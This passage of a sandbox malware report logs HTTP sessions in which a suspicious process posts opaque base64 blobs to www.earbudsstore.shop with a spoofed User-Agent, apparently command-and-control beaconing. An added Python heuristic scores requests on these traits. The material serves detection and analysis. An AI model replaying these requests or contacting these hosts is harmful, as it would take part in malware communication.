                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                      Nov 20, 2024 09:23:48.478913069 CET | 234 | IN | Data Raw: 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69
                                                                      Data Ascii: 5, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
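                                                                      Detection note (added example, not part of the Joe Sandbox report). Sessions 9 to 13 share one request shape: a POST (once a GET) to a short directory-only path such as /cboa/ or /0gis/, a single form field prh4 carrying an opaque base64-like blob, a Referer that is the request's own URL, a fixed "Lumia 521" User-Agent, and a host that changes from www.thaor56.online to www.earbudsstore.shop. The Python below scores raw HTTP requests, as they appear in the dumps above, on those traits. The sample requests are constructed for this example: hosts, paths, headers and blobs are copied from sessions 9, 12 and 13, while the benign request and its host shop.example.com are invented for contrast.

```python
# Added example, not part of the Joe Sandbox report: a heuristic scorer for the
# request shape shared by sessions 9-13 above. Hosts, paths and blobs in the
# samples are copied from the report; the benign request and its host
# shop.example.com are invented.
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# User-Agent sent in every request above; UA_MARKER is the substring keyed on.
C2_UA = ("Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; "
         "WPDesktop; Lumia 521) like Gecko")
UA_MARKER = "WPDesktop; Lumia 521"
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
SHORT_DIR_RE = re.compile(r"^/[a-z0-9]{3,5}/$")  # e.g. /cboa/ or /0gis/
SUSPICIOUS_AT = 3                                # traits needed to flag a request

@dataclass
class HttpRequest:
    method: str
    target: str
    headers: dict
    body: str

def parse_request(raw: str) -> HttpRequest:
    """Parse one raw request; accepts CRLF or LF endings from copied dumps."""
    text = raw.replace("\r\n", "\n").strip("\n")
    head, _, body = text.partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, headers, body.strip())

def split_params(encoded: str) -> dict:
    """Split k=v&k=v WITHOUT decoding: urllib.parse.parse_qs would turn the '+'
    inside a base64 blob into a space and defeat the blob check below."""
    params = {}
    for pair in encoded.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[key] = value
    return params

def looks_like_blob(value: str, min_len: int = 64) -> bool:
    return len(value) >= min_len and B64_RE.match(value) is not None

def score_request(req: HttpRequest):
    """Return (score, reasons); each reason is one trait seen in the sessions."""
    reasons = []
    url = urlsplit(req.target)
    host = req.headers.get("host", "")
    if UA_MARKER in req.headers.get("user-agent", ""):
        reasons.append("fixed 'Lumia 521' User-Agent")
    if SHORT_DIR_RE.match(url.path):
        reasons.append(f"short directory-only path {url.path}")
    if req.headers.get("referer") == f"http://{host}{url.path}":
        reasons.append("Referer is the request's own URL")
    params = split_params(req.body if req.method == "POST" else url.query)
    blobs = [k for k, v in params.items() if looks_like_blob(v)]
    if blobs:
        reasons.append(f"opaque base64-like blob in parameter(s) {blobs}")
    return len(reasons), reasons

def scan(raw_requests):
    """Score a batch; the flagged-host list shows the host rotation between
    sessions 9-12 (www.thaor56.online) and session 13 (www.earbudsstore.shop)."""
    rows, flagged = [], set()
    for raw in raw_requests:
        req = parse_request(raw)
        score, reasons = score_request(req)
        rows.append((req.headers.get("host", ""), req.method, score, reasons))
        if score >= SUSPICIOUS_AT:
            flagged.add(req.headers.get("host", ""))
    return rows, sorted(flagged)

def c2_post(host: str, path: str, blob: str) -> str:
    """Constructed POST carrying the header set the sessions above share."""
    body = f"prh4={blob}"
    return (f"POST {path} HTTP/1.1\r\nHost: {host}\r\nOrigin: http://{host}\r\n"
            "Cache-Control: no-cache\r\nContent-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\nConnection: close\r\n"
            f"Referer: http://{host}{path}\r\nUser-Agent: {C2_UA}\r\n\r\n{body}")

# Constructed sample input; the two blobs are copied from sessions 9 and 13.
BLOB_S9 = ("XddzRFXpS5iIZ930qfOR3/12jIdsJc9PdKTZWF0b0pPg7EoO0Hmp2r+FcXzdiECNz2JiVgdKMVWHALkrWWCUH0f7lGrAPa"
           "WcNNzHVQUzSmFB58Yk3KpA5QQcNZEnq5+kktWcJMxDn0HznFNbYtbjzXK0a9Bup1LJYHBSWV/E/vGfAy0oIUwWLJ7awYx0")
BLOB_S13 = ("XOD8jI/m6V/6ZqT6W8ux0DH9z2Fvl8OEvTduEFjB2Mz/GnkLRn5X52hKgL8VeSM16IImNlbBY3mYoUZMleeWVEbOWH8+QN"
            "Zi9A4sS4WTN40zQxgdXx2TPXKTIie2Ffln+I5hfAKigB+iCwA34oKlEBg5rR6bhIgiWCTMmJ0k378IUm0bpTJWccscNH0Z")
SAMPLE_C2_POSTS = [c2_post("www.thaor56.online", "/cboa/", BLOB_S9),
                   c2_post("www.earbudsstore.shop", "/0gis/", BLOB_S13)]
SAMPLE_C2_GET = ("GET /cboa/?prh4=af1TSyH9ZKWDWOLime6W6+N8m41wPvg6MbDiaGUzr5LnkxoPx276h77cE37euV2f02htPG9gF0GAKqxh"
                 "PgTdbhPG43TCObvDHb/CcXEoGnF55JIhuw==&_VK8=7pXD8zQxGFxP HTTP/1.1\r\nHost: www.thaor56.online\r\n"
                 f"Connection: close\r\nUser-Agent: {C2_UA}\r\n")
SAMPLE_BENIGN_POST = ("POST /accounts/login HTTP/1.1\r\nHost: shop.example.com\r\nOrigin: https://shop.example.com\r\n"
                      "Referer: https://shop.example.com/accounts/login?next=%2Fcart\r\n"
                      "Content-Type: application/x-www-form-urlencoded\r\n"
                      "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/130.0\r\n"
                      "\r\nusername=alice&password=correct-horse&csrf_token=9f2c1a")
```

Running scan(SAMPLE_C2_POSTS + [SAMPLE_C2_GET, SAMPLE_BENIGN_POST]) scores the two POSTs 4, the GET 3 (no Referer) and the benign login 0, and flags both hosts. Two caveats when turning this into a production rule: a self-referential Referer with Origin and Connection: close is exactly what a browser form post looks like, which is why a single trait never flags and the threshold sits at three; and the 404 and 200 responses in the sessions above are not usable as a signal, since the decoy hosts answer with ordinary server error pages whichever way the request is handled.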


                                                                      Session ID: 13 | Source IP: 192.168.2.10 | Source Port: 49989 | Destination IP: 194.195.220.41 | Destination Port: 80 | PID: 6808
                                                                      Process: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:23:53.662223101 CET | 762 | OUT | POST /0gis/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.earbudsstore.shop
                                                                      Origin: http://www.earbudsstore.shop
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 193
                                                                      Connection: close
                                                                      Referer: http://www.earbudsstore.shop/0gis/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 58 4f 44 38 6a 49 2f 6d 36 56 2f 36 5a 71 54 36 57 38 75 78 30 44 48 39 7a 32 46 76 6c 38 4f 45 76 54 64 75 45 46 6a 42 32 4d 7a 2f 47 6e 6b 4c 52 6e 35 58 35 32 68 4b 67 4c 38 56 65 53 4d 31 36 49 49 6d 4e 6c 62 42 59 33 6d 59 6f 55 5a 4d 6c 65 65 57 56 45 62 4f 57 48 38 2b 51 4e 5a 69 39 41 34 73 53 34 57 54 4e 34 30 7a 51 78 67 64 58 78 32 54 50 58 4b 54 49 69 65 32 46 66 6c 6e 2b 49 35 68 66 41 4b 69 67 42 2b 69 43 77 41 33 34 6f 4b 6c 45 42 67 35 72 52 36 62 68 49 67 69 57 43 54 4d 6d 4a 30 6b 33 37 38 49 55 6d 30 62 70 54 4a 57 63 63 73 63 4e 48 30 5a
                                                                      Data Ascii: prh4=XOD8jI/m6V/6ZqT6W8ux0DH9z2Fvl8OEvTduEFjB2Mz/GnkLRn5X52hKgL8VeSM16IImNlbBY3mYoUZMleeWVEbOWH8+QNZi9A4sS4WTN40zQxgdXx2TPXKTIie2Ffln+I5hfAKigB+iCwA34oKlEBg5rR6bhIgiWCTMmJ0k378IUm0bpTJWccscNH0Z
                                                                      Nov 20, 2024 09:23:54.162729979 CET | 875 | IN | HTTP/1.1 200 OK
                                                                      Server: openresty/1.13.6.1
                                                                      Date: Wed, 20 Nov 2024 08:23:54 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 61 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 94 5b 73 a2 30 14 80 df fb 2b 58 1e 3a bb 33 ab 5c d4 5a b7 d0 1d 7b d1 e2 60 ed 54 ab c0 4b 27 24 29 89 0d 09 85 20 e2 ce fe f7 45 ec 56 77 ec cb e6 81 e4 9c 93 73 fb 12 62 7d b9 99 5c cf fc 87 5b 85 c8 98 5d 9e 58 db 49 61 80 47 b6 8a b9 7a 79 a2 54 c3 22 18 a0 dd b2 16 63 2c 81 02 09 48 33 2c 6d f5 69 36 68 9c bf ef dc 9b 89 94 49 03 bf e5 74 65 ab eb 46 0e 1a 50 c4 09 90 34 64 58 55 a0 e0 12 f3 ca d7 b9 b5 31 8a f0 91 37 07 31 b6 d5 15 c5 45 22 52 79 e0 50 50 24 89 8d f0 8a 42 dc a8 85 ef 0a e5 54 52 c0 1a 19 04 0c db 46 53 3f 0c 27 a9 64 f8 d2 d2 76 73 dd 4e 5d 24 17 19 4c 69 22 f7 6d 7d 5e 7b 8a 5f 52 9c 91 83 12 f4 8b 3c 65 f6 b6 bf 1f 9a 56 14 45 57 6f 62 90 86 39 ca 32 29 52 dc cc 88 48 34 55 d1 f6 91 2d ed 38 9b 55 43 3c a4 74 9c a9 f3 5f 99 2c 6d 7f 4c 56 28 50 a9 08 ce 04 40 b6 8a c4 f3 6e f9 f5 db 21 9a 1d 00 45 96 49 c5 5a e2 b5 d4 96 60 05 76 da 83 7d 5b 2e 2f 39 87 92 0a ae 1c 84 52 7e 7d d0 dc 6e d9 8e 82 72 24 8a a6 14 49 93 09 58 9d [TRUNCATED]
                                                                      Data Ascii: 2ab[s0+X:3\Z{`TK'$) EVwsb}\[]XIaGzyT"c,H3,mi6hIteFP4dXU171E"RyPP$BTRFS?'dvsN]$Li"m}^{_R<eVEWob92)RH4U-8UC<t_,mLV(P@n!EIZ`v}[./9R~}nr$IXMR.=(eV}"Lgv5:vIp(q92`J'O}{#Kvj8Fn$c1+B-7~2v6`+ZDN<X@xDwM""=&^aOu,z"2Y?LI`#(f;d_ y?egz.d<bMBI9 oxo/Q663XNv6=T1u9\.7K^g'Bn0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      14 | 192.168.2.10 | 49990 | 194.195.220.41 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:23:56.214131117 CET | 786 | OUT | POST /0gis/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.earbudsstore.shop
                                                                      Origin: http://www.earbudsstore.shop
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 217
                                                                      Connection: close
                                                                      Referer: http://www.earbudsstore.shop/0gis/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 58 4f 44 38 6a 49 2f 6d 36 56 2f 36 57 71 6a 36 46 50 47 78 6a 7a 48 38 76 6d 46 76 72 63 4f 41 76 54 68 75 45 42 37 52 32 5a 6a 2f 47 43 41 4c 4c 6d 35 58 36 32 68 4b 76 72 38 63 61 53 4d 75 36 49 45 55 4e 6e 50 42 59 33 69 59 6f 56 70 4d 6d 76 65 58 48 6b 62 41 65 6e 38 38 55 4e 5a 69 39 41 34 73 53 37 71 35 4e 34 63 7a 54 42 51 64 57 56 69 55 4a 6e 4b 51 42 43 65 32 42 66 6c 6a 2b 49 34 45 66 45 4c 46 67 45 69 69 43 78 51 33 35 36 79 6d 4e 42 67 2f 76 52 37 6c 73 6f 38 76 62 42 37 4b 6e 70 30 77 32 59 4d 37 58 48 4a 63 34 43 6f 42 50 72 77 53 44 42 42 7a 2b 69 35 74 5a 70 2b 70 76 6b 30 58 72 65 61 30 69 5a 57 54 41 67 3d 3d
                                                                      Data Ascii: prh4=XOD8jI/m6V/6Wqj6FPGxjzH8vmFvrcOAvThuEB7R2Zj/GCALLm5X62hKvr8caSMu6IEUNnPBY3iYoVpMmveXHkbAen88UNZi9A4sS7q5N4czTBQdWViUJnKQBCe2Bflj+I4EfELFgEiiCxQ356ymNBg/vR7lso8vbB7Knp0w2YM7XHJc4CoBPrwSDBBz+i5tZp+pvk0Xrea0iZWTAg==
                                                                      Nov 20, 2024 09:23:56.721313953 CET | 875 | IN | HTTP/1.1 200 OK
                                                                      Server: openresty/1.13.6.1
                                                                      Date: Wed, 20 Nov 2024 08:23:56 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 61 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 94 5b 73 a2 30 14 80 df fb 2b 58 1e 3a bb 33 ab 5c ac b5 6c a1 3b d6 56 8b 83 b5 53 ad 0a 2f 9d 90 a4 26 36 24 14 82 88 3b fb df 17 b0 5b dd b1 2f 9b 07 92 73 4e ce ed 4b 88 fd e5 66 dc 9b fa 0f b7 0a 91 11 bb 3a b1 ab 49 61 80 2f 1d 15 73 f5 ea 44 29 87 4d 30 40 bb 65 2d 46 58 02 05 12 90 a4 58 3a ea d3 b4 df b8 78 df b9 37 13 29 e3 06 7e cb e8 da 51 37 8d 0c 34 a0 88 62 20 69 c8 b0 aa 40 c1 25 e6 a5 af 7b eb 60 b4 c4 47 de 1c 44 d8 51 d7 14 e7 b1 48 e4 81 43 4e 91 24 0e c2 6b 0a 71 a3 16 be 2b 94 53 49 01 6b a4 10 30 ec 18 4d fd 30 9c a4 92 e1 2b 5b db cd 75 3b 75 91 5c a4 30 a1 b1 dc b7 f5 79 ed 09 7e 49 70 4a 0e 4a d0 2f b3 84 39 55 7f 3f 34 2d cf f3 8e de c4 20 09 33 94 a6 52 24 b8 99 12 11 6b aa a2 ed 23 db da 71 36 bb 86 78 48 e9 38 53 fb bf 32 d9 da fe 98 ec 50 a0 42 11 9c 09 80 1c 15 89 e7 dd f2 eb b7 43 34 3b 00 8a 2c e2 92 b5 c4 1b a9 ad c0 1a ec b4 07 fb 2a 2e 2f 19 87 92 0a ae 1c 84 52 7e 7d d0 ac b6 54 23 a7 1c 89 bc 29 45 dc 64 02 96 a7 [TRUNCATED]
                                                                      Data Ascii: 2ab[s0+X:3\l;VS/&6$;[/sNKf:Ia/sD)M0@e-FXX:x7)~Q74b i@%{`GDQHCN$kq+SIk0M0+[u;u\0y~IpJJ/9U?4- 3R$k#q6xH8S2PBC4;,*./R~}T#)Ed-x})}K_2vUZ~"L2yF:3' Y.^v`1^K=w{n-h!{bZE3o*I{Vo|For`At$z8Sqqh'x`&VoaM<XE,Lsb>`n|ZBtT('47&!a[jkh1o_imGSOj}V+>lfl7{|)cTu\w.7[.hh0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      15 | 192.168.2.10 | 49991 | 194.195.220.41 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:23:58.763293982 CET | 1799 | OUT | POST /0gis/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.earbudsstore.shop
                                                                      Origin: http://www.earbudsstore.shop
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1229
                                                                      Connection: close
                                                                      Referer: http://www.earbudsstore.shop/0gis/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 58 4f 44 38 6a 49 2f 6d 36 56 2f 36 57 71 6a 36 46 50 47 78 6a 7a 48 38 76 6d 46 76 72 63 4f 41 76 54 68 75 45 42 37 52 32 5a 72 2f 47 78 34 4c 52 42 74 58 37 32 68 4b 6d 4c 38 52 61 53 4e 32 36 49 4d 51 4e 6e 44 37 59 31 4b 59 6f 33 52 4d 6a 64 32 58 65 55 62 41 53 48 38 2f 51 4e 59 6d 39 41 49 6f 53 34 53 35 4e 34 63 7a 54 48 55 64 41 78 32 55 53 6e 4b 54 49 69 65 36 46 66 6c 48 2b 49 67 79 66 45 50 2f 67 33 36 69 44 52 67 33 36 4a 4b 6d 50 68 67 39 6a 78 37 74 73 6f 78 76 62 42 6d 31 6e 71 6f 61 32 62 63 37 48 47 67 71 6f 58 49 66 61 61 45 5a 43 52 51 57 30 47 6c 72 5a 72 37 76 6c 6b 4e 58 33 4e 48 46 72 4e 61 57 44 6b 53 66 61 7a 6e 6a 4d 77 6d 69 35 35 5a 35 51 47 73 61 31 6e 47 36 79 59 47 58 31 78 39 54 47 36 69 35 2f 75 76 79 76 65 69 43 4b 79 6b 6d 4a 56 33 6e 49 61 54 4d 30 35 54 49 7a 65 53 57 65 7a 46 63 6c 6d 39 4f 45 56 4b 33 6e 6c 46 4a 49 75 57 71 77 59 4f 57 43 55 71 59 34 4e 34 6c 42 76 49 4b 46 4f 68 71 55 4c 75 4a 77 37 7a 64 76 69 2b 6a 41 4e 4b 5a 64 43 69 78 43 [TRUNCATED]
                                                                      Data Ascii: prh4= [TRUNCATED]
                                                                      Nov 20, 2024 09:23:59.261960983 CET | 875 | IN | HTTP/1.1 200 OK
                                                                      Server: openresty/1.13.6.1
                                                                      Date: Wed, 20 Nov 2024 08:23:59 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 61 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 94 5b 73 a2 30 14 80 df fb 2b 58 1e 3a bb 33 ab dc ac 96 2d 74 c7 5e b4 38 58 3b d5 aa f0 d2 09 49 6a 62 43 42 21 88 b8 b3 ff 7d 11 bb d5 1d fb b2 79 20 39 e7 e4 dc be 84 38 5f 6e 46 d7 93 e0 e1 56 21 32 66 97 27 ce 76 52 18 e0 0b 57 c5 5c bd 3c 51 aa e1 10 0c d0 6e 59 8b 31 96 40 81 04 a4 19 96 ae fa 34 e9 35 ce df 77 ee cd 44 ca a4 81 df 72 ba 72 d5 75 23 07 0d 28 e2 04 48 1a 31 ac 2a 50 70 89 79 e5 eb dd ba 18 2d f0 91 37 07 31 76 d5 15 c5 45 22 52 79 e0 50 50 24 89 8b f0 8a 42 dc a8 85 ef 0a e5 54 52 c0 1a 19 04 0c bb 46 53 3f 0c 27 a9 64 f8 d2 d1 76 73 dd 4e 5d 24 17 19 4c 69 22 f7 6d 7d 5e 7b 8a 5f 52 9c 91 83 12 f4 8b 3c 65 ee b6 bf 1f 9a 56 14 45 47 6f 62 90 46 39 ca 32 29 52 dc cc 88 48 34 55 d1 f6 91 1d ed 38 9b 53 43 3c a4 74 9c e9 ec bf 32 39 da fe 98 9c 48 a0 52 11 9c 09 80 5c 15 89 e7 dd f2 eb b7 43 34 3b 00 8a 2c 93 8a b5 c4 6b a9 2d c1 0a ec b4 07 fb b6 5c 5e 72 0e 25 15 5c 39 08 a5 fc fa a0 b9 dd b2 1d 05 e5 48 14 4d 29 92 26 13 b0 3a [TRUNCATED]
                                                                      Data Ascii: 2ab[s0+X:3-t^8X;IjbCB!}y 98_nFV!2f'vRW\<QnY1@45wDrru#(H1*Ppy-71vE"RyPP$BTRFS?'dvsN]$Li"m}^{_R<eVEGobF92)RH4U8SC<t29HR\C4;,k-\^r%\9HM)&:mKqu\f?k.F2u-iwn[S!NA\\Rs|H.K]{in c1+d!#]{G9-us&Y"e0L"Z^$0{:o$x8Yfbf`f|ZU,RtD/('4?(Fldv9yE^VG;g!63\v6=T1y\w.7G^g] ?0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      16 | 192.168.2.10 | 49992 | 194.195.220.41 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:24:01.329334021 CET | 498 | OUT | GET /0gis/?prh4=aMrcg/vn2G/nVrnfdsqttTKn7l5IpN7CuDhUOTj2ocWrQXkoPHFbln1FmLoTaWY74KRoWkXSZUSbj2dC1qWbZWPyRks4Yv4++AQZW9eiSbZnXCVOCA==&_VK8=7pXD8zQxGFxP HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.earbudsstore.shop
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Nov 20, 2024 09:24:01.853827000 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                      Server: openresty/1.13.6.1
                                                                      Date: Wed, 20 Nov 2024 08:24:01 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Data Raw: 35 31 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 65 61 72 62 75 64 73 [TRUNCATED]
                                                                      Data Ascii: 512<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.earbudsstore.shop/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.earbudsstore.shop/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1732091041.9737598049&other_args=eyJ1cmkiOiAiLzBnaXMiLCAiYXJncyI6ICJwcmg0PWFNcmNnL3ZuMkcvblZybmZkc3F0dFRLbjdsNUlwTjdDdURoVU9UajJvY1dyUVhrb1BIRmJsbjFGbUxvVGFXWTc0S1JvV2tYU1pVU2JqMmRDMXFXYlpXUHlSa3M0WXY0KytBUVpXOWVpU2JablhDVk9DQT09Jl9WSzg9N3BYRDh6UXhHRnhQIiwgInJlZmVyZXIiOiAiIiwgImFjY2VwdCI6ICJ0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGx [TRUNCATED]
                                                                      Nov 20, 2024 09:24:01.853849888 CET | 230 | IN | Data Raw: 71 4c 79 6f 37 63 54 30 77 4c 6a 67 73 59 58 42 77 62 47 6c 6a 59 58 52 70 62 32 34 76 63 32 6c 6e 62 6d 56 6b 4c 57 56 34 59 32 68 68 62 6d 64 6c 4f 33 59 39 59 6a 4d 37 63 54 30 77 4c 6a 63 69 4c 43 41 69 64 58 4a 70 58 32 4d 69 4f 69 41 69 59
                                                                      Data Ascii: qLyo7cT0wLjgsYXBwbGljYXRpb24vc2lnbmVkLWV4Y2hhbmdlO3Y9YjM7cT0wLjciLCAidXJpX2MiOiAiYzgyYyIsICJhcmdzX2MiOiAiNDg1OCIsICJyZWZlcmVyX2MiOiAiZjViZSIsICJhY2NlcHRfYyI6ICI0Y2ZjIn0="; } </script> </body></html>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
